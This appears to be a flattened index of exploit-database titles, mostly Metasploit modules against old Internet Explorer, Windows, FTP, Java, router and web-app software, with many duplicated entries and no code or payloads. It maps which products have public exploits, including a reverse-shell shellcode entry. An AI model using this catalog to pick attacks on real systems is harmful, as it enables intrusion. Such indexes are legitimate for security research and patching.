msDataSourceObject Memory Corruption (MS09-043) (Metasploit) Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (Metasploit) Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (Metasploit) Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit) Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit) Microsoft Help Center - Cross-Site Scripting / Command Execution (Metasploit) Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (Metasploit) Microsoft Help Center - Cross-Site Scripting / Command Execution (MS10-042) (Metasploit) Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit) Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (Metasploit) Microsoft Internet Explorer - CSS 
SetUserClip Memory Corruption (MS10-090) (Metasploit) Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (Metasploit) Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit) Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit) Microsoft Internet Explorer - COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit) Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2) Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2) Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit) Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (MS10-018) (Metasploit) Microsoft Windows - Shell LNK Code Execution (Metasploit) Microsoft Windows - Shell LNK Code Execution (MS10-046) (Metasploit) Microsoft Internet Explorer - createTextRange() Code Execution (Metasploit) Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit) Microsoft Internet Explorer - Object Type (MS03-020) Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit) Microsoft Internet Explorer - Data Binding Memory Corruption (Metasploit) Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit) Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (Metasploit) Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018) (Metasploit) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (1) Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1) Microsoft Internet Explorer - (VML) Fill Method Code Execution (MS06-055) (Metasploit) Microsoft Internet Explorer - 'Aurora' Memory Corruption (Metasploit) Microsoft Internet Explorer - 'Aurora' Memory 
Corruption (MS10-002) (Metasploit) Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (Metasploit) Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit) CCProxy 6.2 - Telnet Proxy Ping Overflow (2) (Metasploit) CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2) Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) Outlook - ATTACH_BY_REF_RESOLVE File Execution (Metasploit) Outlook - ATTACH_BY_REF_ONLY File Execution (Metasploit) Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit) Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit) Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit) Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit) FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) (Metasploit) httpdx - tolog() Function Format String (1) httpdx - tolog() Function Format String (Metasploit) (1) Microsoft IIS FTP Server - NLST Response Overflow (Metasploit) Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit) Microsoft Message Queueing Service - Path Overflow (Metasploit) Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP) Microsoft RPC DCOM Interface - Overflow Exploit (Metasploit) Microsoft Message Queueing Service - DNS Name Path Overflow (Metasploit) Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit) Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit) Microsoft RPC DCOM Interface - Overflow Exploit (MS03-026) (Metasploit) Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit) IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2) IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow 
(Metasploit) (2) Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1) Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1) httpdx - tolog() Function Format String (2) httpdx - tolog() Function Format String (Metasploit) (2) Exchange 2000 - XEXCH50 Heap Overflow (MS03-046) Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit) NetSupport Manager Agent - Remote Buffer Overflow (2) NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2) Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1) Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1) Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2) Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (Metasploit) (2) SquirrelMail PGP Plugin - Command Execution (SMTP) SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit) ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit) Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2) Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (2) Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit) Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment) Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit) Mozilla Firefox - 'nsTreeRange' Dangling Pointer (1) Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1) Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1) Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1) Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit) ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2) ScriptFTP 3.3 - Remote Buffer Overflow (LIST) 
(Metasploit) (2) Mozilla Firefox - Array.reduceRight() Integer Overflow (2) Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2) Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (Metasploit) Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit) Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2) Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2) Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit) Sun Java Web Start Plugin - Command Line Argument Injection (2012) Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit) Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit) Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit) quickshare file share 1.2.1 - Directory Traversal (2) quickshare file share 1.2.1 - Directory Traversal (Metasploit) (2) Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (Metasploit) Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit) Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit) ComSndFTP 1.3.7 Beta - USER Format String (Write4) Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (Metasploit) ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit) Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit) Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL redirection Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043) 
Microsoft Office SharePoint Server 2007 - Remote Code Execution (Metasploit) Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit) Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006) Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (Metasploit) Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit) Microsoft Internet Explorer 5.5 - Index.dat Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055) Microsoft Visual Studio RAD Support - Buffer Overflow (Metasploit) Microsoft Visual Studio RAD Support - Buffer Overflow (MS03-051) (Metasploit) JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit) Microsoft Internet Explorer 5 - Zone Spoofing Microsoft Internet Explorer 5 - Zone Spoofing (MS01-055) HP SiteScope - Remote Code Execution (1) HP SiteScope - Remote Code Execution (Metasploit) (1) Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023) Metasploit Web UI - Diagnostic Console Command Execution Metasploit Web UI - Diagnostic Console Command Execution (Metasploit) Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027) Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047) Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit) Microsoft Internet Explorer 5 - XML Page Object Type Validation Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040) Microsoft Windows XP/2000 - Messenger 
Service Buffer Overrun Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043) Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013) Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004) Microsoft Internet Explorer - Option Element Use-After-Free (Metasploit) Microsoft Internet Explorer - Option Element Use-After-Free (MS11-081) (Metasploit) Java Applet JMX - Remote Code Execution (1) Java Applet JMX - Remote Code Execution (Metasploit) (1) myServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting VMware OVF Tools - Format String (1) VMware OVF Tools - Format String (Metasploit) (1) VMware OVF Tools - Format String (2) VMware OVF Tools - Format String (Metasploit) (2) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) Java Applet JMX - Remote Code Execution (2) Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) Java Applet JMX - Remote Code Execution (Metasploit) (2) Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code (MS04-038) Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2) Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2) phpMyAdmin - Authenticated Remote Code Execution via preg_replace() phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit) Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020) Microsoft Internet Explorer - textNode Use-After-Free (Metasploit) Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit) Microsoft Internet 
Explorer - COALineDashStyleArray Integer Overflow (MS13-009) Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit) D-Link Devices - Unauthenticated Remote Command Execution (2) D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2) D-Link Devices - Unauthenticated Remote Command Execution (1) D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1) Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit) Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) HP SiteScope - Remote Code Execution (2) Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit) HP SiteScope - Remote Code Execution (Metasploit) (2) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (2) Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2) Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit) Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit) Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit) Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit) Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit) Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) (Metasploit) Microsoft Internet Explorer - CMarkup 
Use-After-Free (MS14-012) Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit) Microsoft Windows Media Center - MCL Exploit (MS15-100) Microsoft Windows Media Center - MCL Exploit (MS15-100) (Metasploit) Advantech Switch - Bash Environment Variable Code Injection (Shellshock) Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit) Oracle BeeHive 2 - voice-servlet processEvaluation() Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit) Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134) IPFire - Bash Environment Variable Injection (Shellshock) IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit) Ruby on Rails - Dynamic Render File Upload / Remote Code Execution Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit) FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow Windows x64 - Reverse Shell TCP Shellcode (694 bytes) phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2) phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2) PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2) PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2) (Metasploit) Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection EditMe CMS - Cross-Site Request Forgery (Add New Admin)